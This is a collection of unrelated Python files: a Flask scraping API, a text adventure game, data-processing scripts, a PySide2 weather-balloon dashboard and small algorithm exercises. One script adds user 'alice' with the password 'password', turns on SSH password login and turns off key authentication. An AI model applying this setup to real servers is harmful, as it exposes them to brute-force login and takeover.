return jsonify(bdd.games)
class SoftwareListAPI(Resource):
def get(self):
return jsonify(bdd.softwares)
# Second selection level
class Nintendo3DSListAPI(Resource):
def get(self):
return jsonify(bdd.nintendo3DS)
class Playstation4ListAPI(Resource):
def get(self):
return jsonify(bdd.playstation4)
class KeyboardMouseListAPI(Resource):
def get(self):
return jsonify(bdd.keyboardMouse)
class PCComponentListAPI(Resource):
def get(self):
return jsonify(bdd.pccomponent)
# Selection the web page to scrap
class Playstation4API(Resource):
def get(self, data_id):
result = get_data(bdd=bdd.playstation4, data_id=data_id)
return result
class Nintendo3DSAPI(Resource):
def get(self, data_id):
result = get_data(bdd=bdd.nintendo3DS, data_id=data_id)
return result
class KeyboardMouseAPI(Resource):
def get(self, data_id):
result = get_data(bdd=bdd.keyboardMouse, data_id=data_id)
return result
class PCComponentAPI(Resource):
def get(self, data_id):
result = get_data(bdd=bdd.pccomponent, data_id=data_id)
return result
class CameraListAPI(Resource):
def get(self):
return jsonify(bdd.camera)
class CameraAPI(Resource):
def get(self, data_id):
result = get_data(bdd=bdd.camera, data_id=data_id)
return result
def main():
app = Flask(__name__)
api = UnicodeApi(app)
@app.route('/')
def redirectIndex():
return redirect('/rakutenscraping/api/v1.0/', code=302)
api.add_resource(ListAPI, '/rakutenscraping/api/v1.0/')
api.add_resource(SoftwareListAPI, '/rakutenscraping/api/v1.0/software')
api.add_resource(KeyboardMouseListAPI, '/rakutenscraping/api/v1.0/software/keyboardmouse')
api.add_resource(KeyboardMouseAPI, '/rakutenscraping/api/v1.0/software/keyboardmouse/<string:data_id>')
api.add_resource(PCComponentListAPI, '/rakutenscraping/api/v1.0/software/pccomponent')
api.add_resource(PCComponentAPI, '/rakutenscraping/api/v1.0/software/pccomponent/<string:data_id>')
api.add_resource(CameraListAPI, '/rakutenscraping/api/v1.0/software/camera')
api.add_resource(CameraAPI, '/rakutenscraping/api/v1.0/software/camera/<string:data_id>')
api.add_resource(GameListAPI, '/rakutenscraping/api/v1.0/games')
api.add_resource(Nintendo3DSListAPI, '/rakutenscraping/api/v1.0/games/3DS')
api.add_resource(Nintendo3DSAPI, '/rakutenscraping/api/v1.0/games/3DS/<string:data_id>')
api.add_resource(Playstation4ListAPI, '/rakutenscraping/api/v1.0/games/PS4')
api.add_resource(Playstation4API, '/rakutenscraping/api/v1.0/games/PS4/<string:data_id>')
app.run()
if __name__ == '__main__':
main()
|
import numpy as np
import matplotlib.pyplot as plt
import pymc3 as pm
from pymc3 import DiscreteUniform, Normal, Exponential, Poisson, traceplot, Uniform, StudentT
from pymc3.math import switch
import scipy.stats as scs
from pymc3.backends.base import merge_traces
from pymc3 import *
import matplotlib
data2early = scs.norm.rvs(loc=270,scale=10,size=40)
data2late = scs.norm.rvs(loc=220,scale=10,size=30)
data2 = np.append(data2early,data2late)
attempts = data2.shape[0]
fig = plt.figure(figsize=(12.5, 3.5))
ax = fig.add_subplot(111)
plt.bar(np.arange(0,attempts),data2,color="#348ABD")
plt.xlabel("Effort Number")
plt.ylabel("Elapsed Time")
plt.title("Runner Segment Completion Times")
plt.xlim(0,attempts)
rec_points_x = [35,35,45,45 ,35]
rec_points_y = [150,290,290,150,150]
plt.plot(rec_points_x,rec_points_y,c='red')
ax.quiver(49,290,-25,-10)
# runner_model = pm.Model()
# with runner_model:
# switchpoint = DiscreteUniform('switchpoint',lower=0, upper=attempts)
#
# early_mean = StudentT('early_mean',mu=250,sd=10,nu=5)
# late_mean = StudentT('late_mean',mu=250,sd=10,nu=5)
#
# rate = switch(switchpoint >= np.arange(attempts),early_mean,late_mean)
#
# disasters = StudentT('disasters',mu=rate,sd=10,nu=5,observed=data2)
#
# startvals = find_MAP(model=runner_model)
# trace = pm.sample(10000,start=startvals,njobs=10)
# traceplot(trace,varnames=['early_mean','late_mean','switchpoint'])
plt.show()
|
from room import Room
from player import Player
# Instantiate rooms
rooms = {
'outside': Room("Outside Cave Entrance",
"North of you, the cave mount beckons"),
'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east."""),
'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light flickers in
the distance, but there is no way across the chasm."""),
'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air."""),
'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely emptied by
earlier adventurers. The only exit is to the south."""),
}
# Define allowed movement
room['outside'].n_to = room['foyer']
room['foyer'].s_to = room['outside']
room['foyer'].n_to = room['overlook']
room['foyer'].e_to = room['narrow']
room['overlook'].s_to = room['foyer']
room['narrow'].w_to = room['foyer']
room['narrow'].n_to = room['treasure']
room['treasure'].s_to = room['narrow']
# dictinary to convert from letters to words, for use in output.
direction_letter_name = {'n': 'North', 'e': 'East', 's': 'South', 'w': 'West'}
# list of allowed direction letters
direction_letters = direction_letter_name.keys()
def direction_letter_to_word(dir_letter):
return direction_letter_name[dir_letter]
def is_movement_possible(direction):
possible_movement_attribute = direction + '_to'
return hasattr(player_1.current_room, possible_movement_attribute)
def move(direction):
to = direction + '_to'
player_1.current_room = getattr(player_1.current_room, to)
def game_loop():
while True:
print()
# * Prints the name of the current room
print(f'You are currently in room {player_1.current_room.name}.')
# * Prints the current description
print(f'{player_1.current_room.description}')
# * Prompts for user input to take next action
action = input('What shall we do?')
# If input is 'q', the game prints a good-bye message and exits.
if action == 'q':
print("You did super! See you again, soon!")
break
# If input is in ['n','e','s','w'], the game tries to move there.
elif action in direction_letters:
if is_movement_possible(action):
print(f'We boldly go {direction_letter_name[action]}!')
move(action)
else: # movement in desired direction is not allowed.
print(f'Stymied! There is no way to move {direction_letter_name[action]}!')
# invalid data was entered.
else:
print("Please enter one of [n, e, s, w, q (for quit).]")
def __main__():
# Instantiates a 'Player'
# Assigns 'outside' as the current 'room'
player_1 = Player(room['outside'])
game_loop() |
from typing import List
from .candidatePath import CandidatePath
class Policy(object):
name: str
color: int
paths: List[CandidatePath]
def __init__(self,
name: str,
color: int,
paths: List[CandidatePath]):
self.name = name
self.color = color
self.paths = paths
def __str__(self):
return "Policy %s with color %d leads to {%s}" % (self.name,
self.color,
",".join(path.__str__() for path in self.paths))
def json(self):
return '{"name": "%s", "color": %d, "paths": %s' % (self.name, self.color,
"[" + ",".join(path.json() for path in self.paths) + "]}")
@classmethod
def parse_json(cls, values: dict):
return Policy(values["name"],
values["color"],
list(map(lambda item: CandidatePath.parse_json(item), values["paths"])))
|
import os
import pexpect
os.system("sudo useradd alice")
child = pexpect.spawn("sudo passwd alice")
child.expect("Enter new UNIX password: ")
child.sendline("password")
child.expect("Retype new UNIX password: ")
child.sendline("password")
#os.system("sudo chown -R alice /home/alice")
#os.system("sudo chgrp -R alice /home/alice")
ssh_config_file = open("/etc/ssh/sshd_config", "r")
new_ssh_config_file = open("/etc/ssh/sshd_config_2", "w")
count = 1
ports = []
for line in ssh_config_file:
if count == 54:
new_ssh_config_file.write("PasswordAuthentication yes\n")
elif count == 33:
new_ssh_config_file.write("RSAAuthentication no\n")
elif count == 34:
new_ssh_config_file.write("PubkeyAuthentication no")
else:
new_ssh_config_file.write(line)
count += 1
ssh_config_file.close()
new_ssh_config_file.close()
os.system("sudo mv /etc/ssh/sshd_config_2 /etc/ssh/sshd_config")
os.system("sudo service ssh restart")
|
import numpy as np
import pyvista as pv
from pyvista import examples
from operator import itemgetter
#mesh = examples.download_teapot()
#mesh.plot(cpos=[-1, 2, -5], show_edges=True)
# Configuration
'''
N = 3
GRID_SIZE = N * N * N
'''
# Extract points, bounds
# Define some helpers - ignore these and use your own data!
'''
dataset_teapot = examples.download_teapot()
dataset_bunny = examples.download_bunny_coarse()
'''
def generate_points(dataset = examples.download_teapot(), subset=1):
"""A helper to make a 3D NumPy array of points (n_points by 3)"""
ids = np.random.randint(low=0, high=dataset.n_points-1,
size=int(dataset.n_points * subset))
bounds = dataset.bounds # x, y, z
center = dataset.center
points = dataset.points[ids]
# Center Align
center = np.array(center).reshape(-1, 3)
points = points - center
# Bounds Align
bounds[0] = bounds[0] - center[0][0]
bounds[1] = bounds[1] - center[0][0]
bounds[2] = bounds[2] - center[0][1]
bounds[3] = bounds[3] - center[0][1]
bounds[4] = bounds[4] - center[0][2]
bounds[5] = bounds[5] - center[0][2]
return points, bounds
# 함수화 작업 필요함.
def generate_grid(points, bounds, N = 3):
grid = np.ndarray((N,N,N), dtype = dict).tolist()
grid_bounds = np.ndarray((N,N,N), dtype = list).tolist()
for i in range(N):
xAxis = (bounds[1] - bounds[0]) / N * (i + 1) + bounds[0]
for j in range(N):
yAxis = (bounds[3] - bounds[2]) / N * (j + 1) + bounds[2]
for k in range(N):
zAxis = (bounds[5] - bounds[4]) / N * (k + 1) + bounds[4]
grid_bounds[i][j][k] = [xAxis - (bounds[1] - bounds[0]) / N, xAxis, yAxis - (bounds[3] - bounds[2]) / N, yAxis, zAxis - (bounds[5] - bounds[4]) / N, zAxis]
for point in points:
for i in range(N): # x
for j in range(N): # y
for k in range(N): # z
# Grid initialize
if grid[i][j][k] is None:
grid[i][j][k] = {
"element": [],
"child": [None] * 2,
}
if point[0] >= grid_bounds[i][j][k][0] and point[0] < grid_bounds[i][j][k][1] and point[1] >= grid_bounds[i][j][k][2] and point[1] < grid_bounds[i][j][k][3] and point[2] >= grid_bounds[i][j][k][4] and point[2] < grid_bounds[i][j][k][5]:
grid[i][j][k]["element"].append(point)
return grid, grid_bounds
# Test
'''
teapot_points, teapot_bounds = generate_points(dataset_teapot)
bunny_points, bunny_bounds = generate_points(dataset_bunny)
teapot_grid, teapot_grid_bounds = generate_grid(teapot_points, teapot_bounds, N)
bunny_grid, bunny_grid_bounds = generate_grid(bunny_points, bunny_bounds, N)
'''
def geneate_grid_clustering(source_grid, destination_grid, N = 3):
for i in range(N):
for j in range(N):
for k in range(N):
sorted_clustering(source_grid[i][j][k], destination_grid[i][j][k])
def sorted_clustering(source_grid, destination_grid):
# Grid 에 아무것도 없을 때 (0:N or N:0 matching)
if (not source_grid["element"]) ^ (not destination_grid["element"]):
print("Error : N의 값을 낮춰야한다.")
raise NotImplementedError
source_grid["element"] = sorted(source_grid["element"], key = itemgetter(0, 1, 2))
generate_tree(source_grid)
destination_grid["element"] = sorted(destination_grid["element"], key = itemgetter(0, 1, 2))
generate_tree(destination_grid)
def generate_tree(tree):
if len(tree["element"]) is not 1 and tree is not None:
tree["child"][0] = {
"element": None,
"child": [None] * 2
}
tree["child"][1] = {
"element": None,
"child": [None] * 2
}
tree["child"][0]["element"] = tree["element"][: len(tree["element"]) // 2]
tree["child"][1]["element"] = tree["element"][len(tree["element"]) // 2 :]
tree["element"] = None
generate_tree(tree["child"][0])
generate_tree(tree["child"][1])
|
import cv2
import numpy as np
img = cv2.imread('home.jpg')
''' file name : pyramids.py
Description : This sample shows how to downsample and upsample images
This is Python version of this tutorial : http://opencv.itseez.com/doc/tutorials/imgproc/pyramids/pyramids.html#pyramids
Level : Beginner
Benefits : Learn to use 1) cv2.pyrUp and 2) cv2.pyrDown
Usage : python pyramids.py
Written by : Abid K. (abidrahman2@gmail.com) , Visit opencvpython.blogspot.com for more tutorials '''
print " Zoom In-Out demo "
print " Press u to zoom "
print " Press d to zoom "
img = cv2.imread('home.jpg')
while(1):
h,w = img.shape[:2]
cv2.imshow('image',img)
k = cv2.waitKey(10)
if k==27 :
break
elif k == ord('u'): # Zoom in, make image double size
img = cv2.pyrUp(img,dstsize = (2*w,2*h))
elif k == ord('d'): # Zoom down, make image half the size
img = cv2.pyrDown(img,dstsize = (w/2,h/2))
cv2.destroyAllWindows()
|
import os
import csv
import argparse
import sys
import pandas as pd
from scipy.spatial.transform import Rotation as R
from scipy.spatial.transform import Slerp
import numpy as np
TIME_COLUMN = 'TimeStamp'
INTERPOLABLE_VEL_COLUMNS = ['vx', 'vy', 'vz', 'vyaw']
INTERPOLABLE_QUAT_COLUMNS = ['odom.quaternion.x', 'odom.quaternion.y', 'odom.quaternion.z', 'odom.quaternion.w']
IMAGE_COLUMNS = [TIME_COLUMN, 'ImageFile']
RESULT_COLUMNS = INTERPOLABLE_VEL_COLUMNS
def get_quat(dict):
q_x = dict['odom.quaternion.x']
q_y = dict['odom.quaternion.y']
q_z = dict['odom.quaternion.z']
q_w = dict['odom.quaternion.w']
q = np.array([q_x, q_y, q_z, q_w])
return q
def get_vel(dict):
v_x = dict['vx']
v_y = dict['vy']
v_z = dict['vz']
v_vec = np.array([v_x, v_y, v_z])
return v_vec
def get_abspath(filename):
return os.path.abspath(
os.path.join(os.path.dirname(__file__), './{}'.format(filename)))
def create_image_path(image_file_name, image_folder_path):
return os.path.abspath(os.path.join(image_folder_path, image_file_name))
def create_suffixed_file(file_path, suffix):
_path, _format = os.path.splitext(file_path)
return '{}_{}{}'.format(_path, suffix, _format)
def interpolate(v0, v1, t):
return round((1 - t) * v0 + t * v1, 8)
def normalize(v0, v1, x):
# makes value between 0 and 1
return (x - v0) / (v1 - v0)
def interpolate_record(record1, record2, image_record):
"""
Returns result record with interpolated values
"""
# interpolate velocities
interpolated_vel_record = {}
t = normalize(record1[TIME_COLUMN], record2[TIME_COLUMN], image_record[TIME_COLUMN])
for col in INTERPOLABLE_VEL_COLUMNS:
interpolated_vel_record[col] = interpolate(record1[col], record2[col], t)
# interpolate rotations of the body frame
q0 = get_quat(record1)
q1 = get_quat(record2)
key_rots = R.from_quat([q0, q1])
key_times = [0, 1]
time_interp = [t]
slerp = Slerp(key_times, key_rots)
interp_rot = slerp(time_interp)
v_world = get_vel(interpolated_vel_record)
# apply rotation to the velocity vector
# needs to be inverse because we interpolated the rotation matrix from body -> world
# and what we're doing here is going from world -> body
v_body = interp_rot.apply(v_world, inverse=True)[0]
# put everything back in dict in body coords
interpolated_vel_body = {}
interpolated_vel_body['vx'] = v_body[0]
interpolated_vel_body['vy'] = v_body[1]
interpolated_vel_body['vz'] = v_body[2]
interpolated_vel_body['vyaw'] = interpolated_vel_record['vyaw']
return interpolated_vel_body
def find_closest_rows(value, iterator):
v1, v2 = None, None
r1, r2 = None, None
for current in iterator:
curr_value = current[1]
if curr_value[TIME_COLUMN] <= value:
v1 = curr_value
elif v1 is not None and curr_value[TIME_COLUMN] >= value:
v2 = curr_value
break
elif v1 is None and curr_value[TIME_COLUMN] >= value:
break
return v1, v2
def split_test_training_data(file_paths, lines_number, test_split=0.2):
test_number = int(lines_number * test_split)
for file_path in file_paths:
f = open(file_path, 'r')
f_test = open(create_suffixed_file(file_path, 'test'), 'w')
f_train = open(create_suffixed_file(file_path, 'train'), 'w')
i = 0
for line in f.readlines():
if i <= test_number:
f_test.writelines(line)
else:
f_train.writelines(line)
i += 1
f.close()
f_train.close()
f_test.close()
os.remove(file_path)
def process(
velocities,
images,
result_velocities_file_path,
result_images_file_path,
images_folder_path):
"""
Process velocities and images frames.
For each row in images:
1) Match 2 closest by timestamp velocities rows to the image record.
2) Calculate normalized parameter t: image_time - vt1 / vt2 - vt1.
vt1, vt2: velocity records timestamps
3) Interpolate velocities values using t.
4) Create new row using image timestamp, image and interpolated values.
"""
velocity_iterator = velocities.iterrows()
f_velocities = open(result_velocities_file_path, 'w+')
f_images = open(result_images_file_path, 'w+')
writer_v = csv.DictWriter(f_velocities, RESULT_COLUMNS, delimiter=',')
writer_i = csv.DictWriter(f_images, ['ImageFile'], delimiter=',')
row_counter, missed = 0, 0
for _, image_row in images.iterrows():
if row_counter % 1000 == 0:
print('{} out of {} images processed -> {}%'.format(row_counter, images.shape[0], 100.0*row_counter/images.shape[0]))
v1, v2 = find_closest_rows(image_row[TIME_COLUMN], velocity_iterator)
# print('{}'.format(v1['TimeStamp'] - image_row[TIME_COLUMN]))
if v1 is None or v2 is None:
continue
interpolated = interpolate_record(v1, v2, image_row)
row_counter += 1
image_path = create_image_path(
image_row['ImageFile'],
images_folder_path
)
if not os.path.isfile(image_path):
missed += 1
continue
writer_v.writerow(interpolated)
writer_i.writerow({
'ImageFile': image_path
})
print('--------------------------------')
print('Missed files: {}'.format(missed))
f_velocities.close()
f_images.close()
# split_test_training_data([result_velocities_file_path, result_images_file_path], row_counter)
def run(
velocities_file_path,
images_file_path,
result_velocities_file_path,
result_images_file_path,
images_folder_path):
velocities = pd.read_csv(velocities_file_path, delimiter=', ')
images = pd.read_csv(
images_file_path, delimiter=', ')
# sys.exit()
process(
velocities,
images,
result_velocities_file_path,
result_images_file_path,
images_folder_path
)
print('------------------------------------')
print('Successfully created the results!')
if __name__ == "__main__":
# parser = argparse.ArgumentParser()
# parser.add_argument("velocity", help="Path to the velocities file")
# parser.add_argument("images", help="Path to the images file")
# parser.add_argument(
# "result_velocities", help="Path to the result velocities file")
# parser.add_argument("result_images", help="Path to the result images file")
# parser.add_argument("images_folder", help="Path to the images folder")
# args = parser.parse_args()
# run(
# args.velocity,
# args.images,
# args.result_velocities,
# args.result_images,
# args.images_folder
# )
base_path = '/home/rb/all_files/il_datasets/bc_test'
run(
os.path.join(base_path, 'moveOnSpline_vel_cmd.txt'),
os.path.join(base_path, 'images.txt'),
os.path.join(base_path, 'proc_vel.txt'),
os.path.join(base_path, 'proc_images.txt'),
os.path.join(base_path, 'images')) |
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from src.app.components.canvas import Canvas
from src.app.components.gauge import Gauge
from src.app.utils.styles import *
from src.app.components.constants import *
class DashboardWindow(object):
def setupUi(self, main_window):
self.parameter_list = []
if not main_window.objectName():
main_window.setObjectName(u"MainWindow")
main_window.resize(830, 520)
self.actionTrack_Balloon = QAction(main_window)
self.actionTrack_Balloon.setObjectName(u"actionTrack_Balloon")
self.actionCreate_File = QAction(main_window)
self.actionCreate_File.setObjectName(u"actionCreate_File")
self.centralwidget = QWidget(main_window)
self.centralwidget.setObjectName(u"centralwidget")
self.gridLayout_2 = QGridLayout(self.centralwidget)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.verticalLayout_2 = QVBoxLayout()
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.gridLayout_3 = QGridLayout()
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.tabWidget = QTabWidget(self.centralwidget)
self.tabWidget.setObjectName(u"tabWidget")
self.tab = QWidget()
self.tab.setObjectName(u"Graph Views")
self.gridLayout = QGridLayout(self.tab)
self.gridLayout.setObjectName(u"gridLayout")
self.gridLayout_4 = QGridLayout()
self.gridLayout_4.setObjectName(u"gridLayout_4")
# ----------- Graph V/s Time -----------------
self.graph_time = Canvas(parent=self.tab)
self.gridLayout_4.addLayout(self.graph_time, 0, 0, 1, 1)
# ----------- Graph V/s Altitude -----------------
self.graph_altitude = Canvas(parent=self.tab, )
self.gridLayout_4.addLayout(self.graph_altitude, 0, 1, 1, 1)
# ----------- Gauges -----------------
self.gauge_row = QHBoxLayout()
self.gauge_row.setObjectName(u"gauge_row")
self.pressure_gauge = Gauge(
parent=self.tab,
assets_path=os.path.join(GAUGE_PATH, "pressure"),
minimum=PRESSURE_MINIMUM,
maximum=PRESSURE_MAXIMUM
)
self.gauge_row.addLayout(self.pressure_gauge)
self.temperature_gauge = Gauge(
parent=self.tab,
assets_path=os.path.join(GAUGE_PATH, "temperature"),
minimum=TEMPERATURE_MINIMUM,
maximum=TEMPERATURE_MAXIMUM
)
self.gauge_row.addLayout(self.temperature_gauge)
self.humidity_gauge = Gauge(
parent=self.tab,
assets_path=os.path.join(GAUGE_PATH, "humidity"),
minimum=HUMIDITY_MINIMUM,
maximum=HUMIDITY_MAXIMUM
)
self.gauge_row.addLayout(self.humidity_gauge)
self.wind_speed_gauge = Gauge(
parent=self.tab,
assets_path=os.path.join(GAUGE_PATH, "wind_speed"),
minimum=WIND_SPEED_MINIMUM,
maximum=WIND_SPEED_MAXIMUM
)
self.gauge_row.addLayout(self.wind_speed_gauge)
self.wind_direction_gauge = Gauge(
parent=self.tab,
assets_path=os.path.join(GAUGE_PATH, "wind_direction"),
minimum=WIND_DIRECTION_MINIMUM,
maximum=WIND_DIRECTION_MAXIMUM
)
self.gauge_row.addLayout(self.wind_direction_gauge)
self.altitude_gauge = Gauge(
parent=self.tab,
assets_path=os.path.join(GAUGE_PATH, "altitude"),
minimum=ALTITUDE_MINIMUM,
maximum=ALTITUDE_MAXIMUM
)
self.gauge_row.addLayout(self.altitude_gauge)
self.gridLayout_4.addLayout(self.gauge_row, 1, 0, 1, 3)
# Graph Index
self.parameter_group = QGroupBox(self.tab)
self.parameter_group.setObjectName(u"parameter_group")
self.parameter_group.setMinimumSize(QSize(150, 230))
self.parameter_group.setMaximumSize(QSize(150, 230))
self.layoutWidget_2 = QWidget(self.parameter_group)
self.layoutWidget_2.setObjectName(u"layoutWidget_2")
self.layoutWidget_2.setGeometry(QRect(10, 30, 116, 176))
self.verticalLayout = QVBoxLayout(self.layoutWidget_2)
self.verticalLayout.setObjectName(u"verticalLayout")
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.temperature_check = QCheckBox(self.layoutWidget_2)
self.temperature_check.setChecked(True)
self.temperature_check.setStyleSheet(temperature_checkbox_indicator)
self.verticalLayout.addWidget(self.temperature_check)
self.pressure_check = QCheckBox(self.layoutWidget_2)
self.pressure_check.setStyleSheet(pressure_checkbox_indicator)
self.verticalLayout.addWidget(self.pressure_check)
self.humidity_check = QCheckBox(self.layoutWidget_2)
self.humidity_check.setChecked(True)
self.humidity_check.setStyleSheet(humidity_checkbox_indicator)
self.verticalLayout.addWidget(self.humidity_check)
self.wind_speed_check = QCheckBox(self.layoutWidget_2)
self.wind_speed_check.setStyleSheet(wind_speed_checkbox_indicator)
self.verticalLayout.addWidget(self.wind_speed_check)
self.altitude_check = QCheckBox(self.layoutWidget_2)
self.altitude_check.setStyleSheet(altitude_checkbox_indicator)
self.verticalLayout.addWidget(self.altitude_check)
self.gridLayout_4.addWidget(self.parameter_group, 0, 2, 1, 1)
self.gridLayout.addLayout(self.gridLayout_4, 0, 0, 1, 1)
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QWidget()
self.tab_2.setObjectName(u"tab_2")
self.gridLayout_5 = QGridLayout(self.tab_2)
self.gridLayout_5.setObjectName(u"gridLayout_5")
self.table = QTableWidget(self.tab_2)
if (self.table.columnCount() < 6):
self.table.setColumnCount(6)
__qtablewidgetitem = QTableWidgetItem()
self.table.setHorizontalHeaderItem(0, __qtablewidgetitem)
__qtablewidgetitem1 = QTableWidgetItem()
self.table.setHorizontalHeaderItem(1, __qtablewidgetitem1)
__qtablewidgetitem2 = QTableWidgetItem()
self.table.setHorizontalHeaderItem(2, __qtablewidgetitem2)
__qtablewidgetitem3 = QTableWidgetItem()
self.table.setHorizontalHeaderItem(3, __qtablewidgetitem3)
__qtablewidgetitem4 = QTableWidgetItem()
self.table.setHorizontalHeaderItem(4, __qtablewidgetitem4)
__qtablewidgetitem5 = QTableWidgetItem()
self.table.setHorizontalHeaderItem(5, __qtablewidgetitem5)
self.table.setObjectName(u"table")
self.table.setMaximumSize(QSize(600, 16777215))
self.gridLayout_5.addWidget(self.table, 0, 0, 1, 1)
self.spec_graph = Canvas(parent=self.tab_2)
self.gridLayout_5.addLayout(self.spec_graph, 0, 1, 1, 1)
self.visualization_group = QGroupBox(self.tab_2)
self.visualization_group.setObjectName(u"visualization_group")
self.visualization_group.setMinimumSize(QSize(100, 150))
self.visualization_group.setMaximumSize(QSize(200, 150))
self.layoutWidget = QWidget(self.visualization_group)
self.layoutWidget.setObjectName(u"layoutWidget")
self.layoutWidget.setGeometry(QRect(10, 30, 114, 112))
self.verticalLayout_3 = QVBoxLayout(self.layoutWidget)
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.skewt_check = QRadioButton(self.layoutWidget)
self.skewt_check.setObjectName(u"skewt_check")
self.verticalLayout_3.addWidget(self.skewt_check)
self.tphi_check = QRadioButton(self.layoutWidget)
self.tphi_check.setObjectName(u"tphi_check")
self.verticalLayout_3.addWidget(self.tphi_check)
self.stuve_check = QRadioButton(self.layoutWidget)
self.stuve_check.setObjectName(u"stuve_check")
self.verticalLayout_3.addWidget(self.stuve_check)
self.hodograph_check = QRadioButton(self.layoutWidget)
self.hodograph_check.setObjectName(u"hodograph_check")
self.verticalLayout_3.addWidget(self.hodograph_check)
self.gridLayout_5.addWidget(self.visualization_group, 0, 2, 1, 1)
self.tabWidget.addTab(self.tab_2, "")
self.gridLayout_3.addWidget(self.tabWidget, 0, 0, 2, 1)
self.horizontalLayout_2.addLayout(self.gridLayout_3)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.gridLayout_2.addLayout(self.verticalLayout_2, 0, 0, 1, 1)
main_window.setCentralWidget(self.centralwidget)
# ------------------ MENU BAR -------------------
self.menubar = QMenuBar(main_window)
self.menubar.setObjectName(u"menubar")
self.menubar.setGeometry(QRect(0, 0, 830, 22))
# ---------------- MENU Visualization --------------
self.menuVisualization = QMenu(self.menubar)
self.menuVisualization.setObjectName(u"menuVisualization")
# ---------------- MENU Files --------------
self.menuFiles = QMenu(self.menubar)
self.menuFiles.setObjectName(u"menuFiles")
main_window.setMenuBar(self.menubar)
self.statusbar = QStatusBar(main_window)
self.statusbar.setObjectName(u"statusbar")
main_window.setStatusBar(self.statusbar)
self.menubar.addAction(self.menuVisualization.menuAction())
self.menuVisualization.addAction(self.actionTrack_Balloon)
self.menubar.addAction(self.menuFiles.menuAction())
self.menuFiles.addAction(self.actionCreate_File)
self.retranslateUi(main_window)
self.tabWidget.setCurrentIndex(0)
QMetaObject.connectSlotsByName(main_window)
main_window.show()
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QCoreApplication.translate(
"MainWindow", u"MainWindow", None))
self.actionTrack_Balloon.setText(
QCoreApplication.translate("MainWindow", u"Track Balloon", None))
self.actionCreate_File.setText(
QCoreApplication.translate("MainWindow", u"NetCDF", None))
self.temperature_check.setText(
QCoreApplication.translate("MainWindow", u"Temperature", None))
self.pressure_check.setText(
QCoreApplication.translate("MainWindow", u"Pressure", None))
self.humidity_check.setText(
QCoreApplication.translate("MainWindow", u"Humidity", None))
self.wind_speed_check.setText(
QCoreApplication.translate("MainWindow", u"WindSpeed", None))
self.altitude_check.setText(
QCoreApplication.translate("MainWindow", u"Altitude", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(
self.tab), QCoreApplication.translate("MainWindow", u"Tab 1", None))
self.visualization_group.setTitle(
QCoreApplication.translate("MainWindow", u"Visualization", None))
self.parameter_group.setTitle(
QCoreApplication.translate("MainWindow", u"Parameters", None))
self.skewt_check.setText(
QCoreApplication.translate("MainWindow", u"Skew-T", None))
self.tphi_check.setText(
QCoreApplication.translate("MainWindow", u"T-Phi", None))
self.stuve_check.setText(
QCoreApplication.translate("MainWindow", u"Stuve", None))
self.hodograph_check.setText(
QCoreApplication.translate("MainWindow", u"Hodograph", None))
___qtablewidgetitem = self.table.horizontalHeaderItem(0)
___qtablewidgetitem.setText(
QCoreApplication.translate("MainWindow", u"Time[s]", None))
___qtablewidgetitem1 = self.table.horizontalHeaderItem(1)
___qtablewidgetitem1.setText(
QCoreApplication.translate("MainWindow", u"P[hPa]", None))
___qtablewidgetitem2 = self.table.horizontalHeaderItem(2)
___qtablewidgetitem2.setText(
QCoreApplication.translate("MainWindow", u"T[C]", None))
___qtablewidgetitem3 = self.table.horizontalHeaderItem(3)
___qtablewidgetitem3.setText(
QCoreApplication.translate("MainWindow", u"Hu[%]", None))
___qtablewidgetitem4 = self.table.horizontalHeaderItem(4)
___qtablewidgetitem4.setText(
QCoreApplication.translate("MainWindow", u"Ws[m/s]", None))
___qtablewidgetitem5 = self.table.horizontalHeaderItem(5)
___qtablewidgetitem5.setText(
QCoreApplication.translate("MainWindow", u"Wd[]", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(
self.tab_2), QCoreApplication.translate("MainWindow", u"Tab 2", None))
self.menuVisualization.setTitle(
QCoreApplication.translate("MainWindow", u"Visualization", None))
self.menuFiles.setTitle(
QCoreApplication.translate("MainWindow", u"Files", None))
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 14 20:12:21 2020
@author: Soham Shah
"""
class Solution:
def arrangeCoins(self, n: int) -> int:
ans = 0
if n <= 1:
return n
for i in range(0,n+1):
ans = (i*(i+1))//2
if ans > n:
return i-1 |
from binarytree import Node as Treenode
class Solution(object):
def __init__(self):
self.path = []
def k_path_sum(self, root, k):
if root is None:
return
#print 'Visiting {}'.format(root.value)
self.path.append(root.value)
self.k_path_sum(root.left, k)
self.k_path_sum(root.right, k)
#print 'Current path: {}'.format(self.path)
currsum = 0
for i in reversed(xrange(len(self.path))):
currsum += self.path[i]
if currsum == k:
print self.path[i:]
self.path.pop()
root = Treenode(1)
root.left = Treenode(3)
root.left.left = Treenode(2)
root.left.right = Treenode(1)
root.left.right.left = Treenode(1)
root.right = Treenode(-1)
root.right.left = Treenode(4)
root.right.left.left = Treenode(1)
root.right.left.right = Treenode(2)
root.right.right = Treenode(5)
root.right.right.right = Treenode(2)
print(root)
S = Solution()
S.k_path_sum(root, 5) |
# %%
#--------------------------------- Importing library ---------------------------------#
# OS, IO
from scipy.io import wavfile
import os, sys, shutil
# Sound Processing library
import librosa
from pydub import AudioSegment
# Midi Processing library
from mido import MidiFile, MidiTrack, Message, MetaMessage
from mido import tick2second, second2tick
# Math Library
import numpy as np
import random
# Display library
import IPython.display as ipd
import matplotlib.pyplot as plt
%matplotlib inline
plt.interactive(True)
import librosa.display
# Data Preprocessing
from keras.utils import to_categorical
from keras.preprocessing.text import Tokenizer
import sklearn
# Deep Learning Library
from keras.models import Model, Sequential
